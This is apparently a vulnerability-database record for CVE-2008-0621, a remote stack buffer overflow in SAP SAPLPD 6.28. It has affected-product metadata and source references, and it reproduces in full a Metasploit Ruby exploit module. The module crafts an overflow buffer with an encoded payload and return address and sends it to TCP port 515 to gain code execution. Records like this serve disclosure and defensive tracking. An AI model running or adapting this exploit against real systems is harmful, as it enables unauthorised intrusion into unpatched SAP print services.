ID

VAR-E-200802-0399


CVE

cve_id:CVE-2008-0621

Trust: 2.4

cve_id:CVE-2008-0620

Trust: 0.3

sources: BID: 27613 // PACKETSTORM: 83081 // EXPLOIT-DB: 16338 // EDBNET: 39035

EDB ID

16338


TITLE

SapLPD 6.28 - Remote Buffer Overflow (Metasploit) - Windows remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 16338

DESCRIPTION

SapLPD 6.28 - Remote Buffer Overflow (Metasploit). CVE-2008-0621CVE-41127 . remote exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 16338

AFFECTED PRODUCTS

vendor:sapmodel:saplpdscope:eqversion:6.28

Trust: 1.4

vendor:saplpdmodel: - scope:eqversion:6.28

Trust: 1.0

vendor:sapmodel:sapsprintscope:eqversion:0

Trust: 0.3

vendor:sapmodel:saplpdscope:eqversion:0

Trust: 0.3

vendor:sapmodel:sapsprintscope:neversion:1018

Trust: 0.3

vendor:sapmodel:gui for windows patch levelscope:neversion:7.006

Trust: 0.3

vendor:sapmodel:gui for windows patch levelscope:neversion:6.4030

Trust: 0.3

vendor:sapmodel:gui for windows patch levelscope:neversion:6.2072

Trust: 0.3

sources: BID: 27613 // PACKETSTORM: 83081 // EXPLOIT-DB: 16338 // EDBNET: 39035

EXPLOIT

##
# $Id: saplpd.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'SAP SAPLPD 6.28 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SAPlpd 6.28 (SAP Release 6.40) .
By sending an overly long argument, an attacker may be able to execute arbitrary
code.
},
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-0621' ],
[ 'OSVDB', '41127' ],
[ 'BID', '27613' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
[ 'SAPlpd 6.28.0.1 (SAP Release 6.40)', { 'Ret' => 0x005e72d7 } ], #SAPlpd.exe 3/7/2006
],
'Privileged' => true,
'DisclosureDate' => 'Feb 4 2008',
'DefaultTarget' => 0))

register_options([Opt::RPORT(515)], self)
end

def exploit
connect

sploit = "\x02"
sploit << rand_text_alpha_upper(484 - payload.encoded.length)
sploit << payload.encoded
sploit << [target.ret].pack('V')
sploit << [0xe9, -375].pack('CV')

print_status("Trying target #{target.name}...")

sock.puts(sploit)

handler
disconnect
end
end

Trust: 1.0

sources: EXPLOIT-DB: 16338

EXPLOIT LANGUAGE

rb

Trust: 0.6

sources: EXPLOIT-DB: 16338

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 16338

TYPE

Remote Buffer Overflow (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 16338

TAGS

tag:Metasploit Framework (MSF)

Trust: 1.0

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

tag:arbitrary

Trust: 0.5

sources: PACKETSTORM: 83081 // EXPLOIT-DB: 16338

CREDITS

Metasploit

Trust: 0.6

sources: EXPLOIT-DB: 16338

EXTERNAL IDS

db:NVDid:CVE-2008-0621

Trust: 2.4

db:EXPLOIT-DBid:16338

Trust: 1.6

db:EDBNETid:39035

Trust: 0.6

db:PACKETSTORMid:83081

Trust: 0.5

db:NVDid:CVE-2008-0620

Trust: 0.3

db:BIDid:27613

Trust: 0.3

sources: BID: 27613 // PACKETSTORM: 83081 // EXPLOIT-DB: 16338 // EDBNET: 39035

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2008-0621

Trust: 2.1

url:https://www.exploit-db.com/exploits/16338/

Trust: 0.6

sources: PACKETSTORM: 83081 // EXPLOIT-DB: 16338 // EDBNET: 39035

SOURCES

db:BIDid:27613
db:PACKETSTORMid:83081
db:EXPLOIT-DBid:16338
db:EDBNETid:39035

LAST UPDATE DATE

2022-07-27T09:46:12.107000+00:00


SOURCES UPDATE DATE

db:BIDid:27613date:2016-07-05T22:00:00

SOURCES RELEASE DATE

db:BIDid:27613date:2008-02-04T00:00:00
db:PACKETSTORMid:83081date:2009-11-26T00:34:53
db:EXPLOIT-DBid:16338date:2010-05-09T00:00:00
db:EDBNETid:39035date:2010-05-09T00:00:00